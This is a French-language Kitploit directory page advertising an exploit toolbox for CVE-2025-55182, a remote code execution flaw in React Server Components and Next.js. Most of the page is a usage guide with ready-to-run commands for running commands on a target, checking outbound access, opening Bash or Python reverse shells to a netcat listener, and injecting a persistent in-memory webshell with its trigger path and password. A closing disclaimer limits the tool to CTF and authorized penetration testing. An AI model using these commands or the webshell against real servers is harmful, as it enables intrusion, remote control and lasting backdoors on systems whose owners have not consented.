Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182-Toolbox — Outil d'exploitation automatisé pour CVE-2025-55182 (RCE React/Next.js) avec exécution de commandes, détection sortante, shell inverse interactif et injection de webshell mémoire persistante pour les tests d'intrusion autorisés et les défis CTF. | Kitploit
Outils/GitHubGitHub/lamaper/cve-2025-55182-toolbox
Mécanismes de PersistanceExploitationExploitation d'Applications WebPost-ExploitationCTFTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHublamaper/cve-2025-55182-toolbox

CVE-2025-55182-Toolbox

Outil d'exploitation automatisé pour CVE-2025-55182 (RCE React/Next.js) avec exécution de commandes, détection sortante, shell inverse interactif et injection de webshell mémoire persistante pour les tests d'intrusion autorisés et les défis CTF.

Voir le dépôt
14il y a 8 moisPas encore vérifié
Partager

React2Shell : outil d'exploitation complet pour CVE-2025-55182

Auteur : lamaper / BITs2Sys

Version : 1.0.1

Licence : MIT

📝 Description de l'outil

Cet outil est un outil de test d'intrusion automatisé spécialement conçu pour CVE-2025-55182 (RCE provoquée par une pollution du prototype dans React Server Components / Next.js). Il est destiné aux compétitions CTF et aux projets de sécurité autorisés, et intègre plusieurs fonctionnalités : validation de la vulnérabilité, détection des accès sortants, reverse shell et injection de cheval de Troie en mémoire.

🚀 Fonctionnalités principales

  • Exécution de commande en une commande (--cmd) : utilise le mécanisme d'exception NEXT_REDIRECT pour renvoyer avec précision les résultats d'exécution de commandes encodés en Base64.
  • Détection de l'accès sortant (--check-outbound) : teste automatiquement la capacité de la cible à accéder à DNS, HTTP et ICMP, afin d'aider à décider de la voie d'attaque.
  • : intègre deux modes de reverse shell, Bash et Python3, avec exécution asynchrone pour éviter que les requêtes HTTP ne restent bloquées.
Reverse Shell interactif (--shell)
  • Cheval de Troie en mémoire persistant (--inject-ms) : injecte un cheval de Troie en mémoire en détournant le mécanisme de distribution d'événements du serveur http.Server de Node.js, sans laisser de fichier résiduel, et permet un contrôle persistant.
  • Interface d'interaction du cheval de Troie en mémoire (--ms-cmd) : mode interactif indépendant du chemin de déclenchement de la vulnérabilité ; une fois l'injection réussie, les commandes peuvent être exécutées directement via la backdoor.
  • 🛠️ Installation et dépendances

    Cet outil est développé en Python 3 et nécessite uniquement l'installation de la bibliothèque requests.

    root@kitploit:~
    pip install requests
    

    📖 Guide d'utilisation

    0. Vérifier si la vulnérabilité existe

    https://github.com/assetnote/react2shell-scanner est un outil de détection très pratique.

    1. Exécution de commande de base

    Récupérer directement des informations sur la cible :

    root@kitploit:~
    python exploit.py --url http://target.com/ --cmd "id"
    python exploit.py --url http://target.com/ --cmd "cat /flag"
    

    2. Détection de l'accès sortant

    Avant de tenter un reverse shell, confirmez que la cible peut accéder à Internet :

    root@kitploit:~
    python exploit.py --url http://target.com/ --check-outbound
    

    3. Reverse Shell

    Mode Bash :

    root@kitploit:~
    # 攻击机执行监听: nc -lvnp 4444
    python exploit.py --url http://target.com/ --shell bash --ip <你的IP> --port 4444
    

    Mode Python :

    root@kitploit:~
    python exploit.py --url http://target.com/ --shell python --ip <你的IP> --port 4444
    

    4. Exploitation du cheval de Troie en mémoire (persistant)

    Injecter le cheval de Troie en mémoire :

    root@kitploit:~
    python exploit.py --url http://target.com/ --inject-ms
    

    Exécuter des commandes via le cheval de Troie en mémoire (après injection réussie) :

    root@kitploit:~
    python exploit.py --url http://target.com/ --ms-cmd "whoami"
    

    Note : le cheval de Troie en mémoire est monté par défaut sur /?pass, déclenché en envoyant le paramètre pwd via POST.

    Connexion via AntSword (蚁剑) :

    Mot de passe de connexion : pwd, type de connexion : CMDLINUX

    ⚠️ Avertissement

    Cet outil est destiné uniquement à la recherche en sécurité dans les limites prévues par la loi, aux compétitions CTF et aux tests d'intrusion autorisés. Toute utilisation pour des attaques illégales est strictement interdite. L'utilisateur est seul responsable de toutes les conséquences découlant de l'utilisation de cet outil.


    Télécharger l’outil